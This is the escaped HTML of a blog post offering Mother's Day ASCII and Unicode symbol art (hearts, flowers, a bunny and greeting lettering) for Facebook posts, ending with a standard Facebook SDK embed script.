&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;.......... || ||&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;....... ooO Ooo&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;................................. ~*(✿ )*~.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;..............................(( *+* *+* ))&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;........................ ((_,»*¯*«*»*¯*«, _))&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;..........((_,»*¯*«*»*¯*«,_)) ((_,»*¯*«*»*¯*«,_))&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;»*¯*«*»*¯*«,_)) ((_,»*¯*«*»*¯*«,_)) ((_,»*¯*«*»*¯*«&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;❤•.¸✿¸.•❤•.❀ ԋαρρყ ɱσƚԋҽɾ´ʂ ԃαყ! ❀.•❤•.¸✿¸.•❤&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;»*¯*«*»*¯*«,_)) ((_,»*¯*«*»*¯*«,_)) ((_,»*¯*«*»*¯*«&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;..........((_,»*¯*«*»*¯*«,_)) ((_,»*¯*«*»*¯*«,_))&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;.........................((_,»*¯*«*»*¯*«, _))&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;..............................(( *+* *+* ))&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;................................~*(✿ )*~.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;ஜ۩۞۩ஜ♥ஜ۩۞۩ஜ♥ஜ۩۞۩ஜ♥ஜ۩۞۩ஜ♥ஜ۩۞۩ஜ&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;•*´¨`*•.¸¸.•*´¨`*•.¸¸.•*´¨`*•.¸¸.•*´¨`*•.¸¸.•&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;::: (\_(\ ...*...*...*...*...*...*...*...*...*...*...*...*&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;*: (=' :') :::::::: HAPPY MOTHERS DAY ::::::::::&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;•.. (,('')('')¤...*...*...*...*...*...*...*...*...*...*...*&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;¸.•*´¨`*•.¸¸.•*´¨`*•.¸¸.•*´¨`*•.¸¸.•*´¨`*•.¸&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;ஜ۩۞۩ஜ♥ஜ۩۞۩ஜ♥ஜ۩۞۩ஜ♥ஜ۩۞۩ஜ♥ஜ۩۞۩ஜ&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;• facebook symbols big shapes, ascii art:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;[̲̅h̲̅][̲̅a̲̅][̲̅p̲̅][̲̅p̲̅][̲̅y̲̅] [̲̅m̲̅][̲̅o̲̅][̲̅t̲̅][̲̅h̲̅][̲̅e̲̅][̲̅r̲̅]'[̲̅s̲̅] [̲̅d̲̅][̲̅a̲̅][̲̅y̲̅]&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;_____________8__88_____8&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;____________88_8__8_____8&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;___________888_____88___88888&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;__________8888______88_8____88&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;_________8888_______88______8_8&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;_________8888_______88______8_8&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;_________8888_______8_______8&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;_________8888_____8_______8&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;__________88888____8______8&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;___________8888888______8&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;__888_________88888_8&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;8888888________88_____&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;_8888888_______8_____&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;__888888_______88_____&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;___88_____8_____8_____&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;____8______8____8_____8_88&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;_______8888_8__88_8_88888&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;_____888888_8_88__8888888&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;____8888888__88______88888&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;____88888_____8_________888&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;____88_________8__________8&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;_____8_________8_____&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;_______________8_____&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;____________8_8_____&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;_____________88_8_____&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;______________88_____&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;______________8_____&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;[̲̅h̲̅][̲̅a̲̅][̲̅p̲̅][̲̅p̲̅][̲̅y̲̅] [̲̅m̲̅][̲̅o̲̅][̲̅t̲̅][̲̅h̲̅][̲̅e̲̅][̲̅r̲̅]'[̲̅s̲̅] [̲̅d̲̅][̲̅a̲̅][̲̅y̲̅]&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;______________¶¶¶¶¶_____________¶¶¶¶¶&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;___________¶¶¶¶¶¶¶¶¶¶¶______¶¶¶¶¶¶¶¶¶¶¶¶&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;_______¶¶¶¶¶¶______¶¶¶¶¶¶¶¶¶¶¶¶______¶¶¶¶¶¶¶&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;_____¶¶¶¶¶_____________¶¶¶¶¶____________¶¶¶¶¶¶&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;____¶¶¶¶______♥______________________♥_____¶¶¶¶&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;___¶¶¶_______________________♥_______________¶¶¶&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;__¶¶¶_________________________________________¶¶¶&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;__¶¶___________________________________________¶¶&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;_¶¶¶_______¶¶¶_____¶______¶¶¶___¶¶_____¶¶______¶¶¶&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;_¶¶¶________¶¶____¶¶___¶¶¶¶¶¶¶__¶¶____¶¶¶______¶¶¶&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;_¶¶¶________¶¶¶__¶¶¶__¶_¶¶___¶__¶¶¶__¶¶¶_______¶¶¶&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;_¶¶¶_______¶¶¶¶¶¶¶¶¶_¶¶_____¶¶__¶¶¶¶¶¶¶¶_______¶¶¶&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;_¶¶¶_______¶¶_¶¶¶_¶¶_¶¶¶___¶¶__¶¶_¶¶¶_¶¶_______¶¶¶&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;__¶¶¶______¶¶_____¶¶___¶¶¶¶¶___¶¶_____¶¶______¶¶¶&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;__¶¶¶¶_______________________________________¶¶¶&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;___¶¶¶¶_____________________________________¶¶¶&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;_____¶¶¶__________________________________¶¶¶¶&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;______¶¶¶¶_______________________________¶¶¶¶&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;________¶¶¶¶¶_______♥_________________¶¶¶¶¶&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;__________¶¶¶¶_____________♥_♥______¶¶¶¶¶&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;____________¶¶¶¶________♥_♥________¶¶¶¶&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;______________¶¶¶¶¶______♥______¶¶¶¶¶&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;________________¶¶¶¶¶_________¶¶¶¶¶&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;__________________¶¶¶¶¶_____¶¶¶¶&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;____________________¶¶¶¶¶¶¶¶¶¶&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;________________________¶¶¶&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;_____$$$$$$$$$$$$$_________$$$$$______$$$$$&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;______$$$$$$$$$$$________$$$$$$$$$__$$$$$$$$$&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;_______$$$$$$$$$________$$$$$$$$$$$$$$$$$$$$$$&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;________$$$$$$$_________$$$$$$$$$$$$$$$$$$$$$$&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;________$$$$$$$_________$$$$$$$$$$$$$$$$$$$$$$&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;________$$$$$$$_________$$$$$$$$$$$$$$$$$$$$$$&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;________$$$$$$$__________$$$$$$$$$$$$$$$$$$$$&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;________$$$$$$$____________$$$$$$$$$$$$$$$&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;________$$$$$$$_______________$$$$$$$$$$&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;_______$$$$$$$$$________________$$$$$$&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;______$$$$$$$$$$$_________________$$&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;_____$$$$$$$$$$$$$&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;______________________________________________&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;______$$$$____$$$$__$$$$$___$$$$_$$$$____$$$$$&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;_____$$$$$____$$$$$_$$$$$___$$$$_$$$$____$$$$$&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;______$$$$____$$$$__$$$$$____$$__$$$$$___$$$$$&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;______$$$$$___$$$$___$$$_____$$__$$$$$___$$$$&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;______$$$$$$_$$$$$__$$$$_____$$__$$$$$$_$$$$$&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;______$$$$$$$$$$$$__$$$$_____$$__$$$$$$$$$$$$&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;______$$$$$$$$$$$$__$$$$_____$$__$$$$$$$$$$$$&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;______$$__$$$__$$$__$$$$_____$$__$$$_$$$$_$$$&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;______$$__$$$__$$$__$$$$_____$$__$$$_$$$__$$$&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;______$$__$$$__$$$___$$$$___$$$__$$$_$$$__$$$&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;______$$$__$__$$$$___$$$$$$$$$__$$$$_$$$_$$$$$&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;_____$$$$__$__$$$$$___$$$$$$$___$$$$__$__$$$$$&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="line-height: 16px;"&gt;&lt;span class="Apple-style-span" style="font-family: verdana; font-size: x-small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="font-family: verdana; line-height: 16px;"&gt;&lt;b style="color: #990000;"&gt;You may like this too&lt;/b&gt;&amp;nbsp; &lt;a href="http://hackrich.blogspot.com/2011/11/facebook-animated-status.html" target="_blank"&gt;Facebook Animated Gif Image Status&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div id="fb-root"&gt;&lt;/div&gt;&lt;script&gt;
(function(d){
  var js, id = 'facebook-jssdk'; if (d.getElementById(id)) {return;}
  js = d.createElement('script'); js.id = id; js.async = true;
  js.src = "//connect.facebook.net/en_US/all.js#appId=106068299500309&amp;xfbml=1";
  d.getElementsByTagName('head')[0].appendChild(js);
}(document));
&lt;/script&gt;&lt;br /&gt;
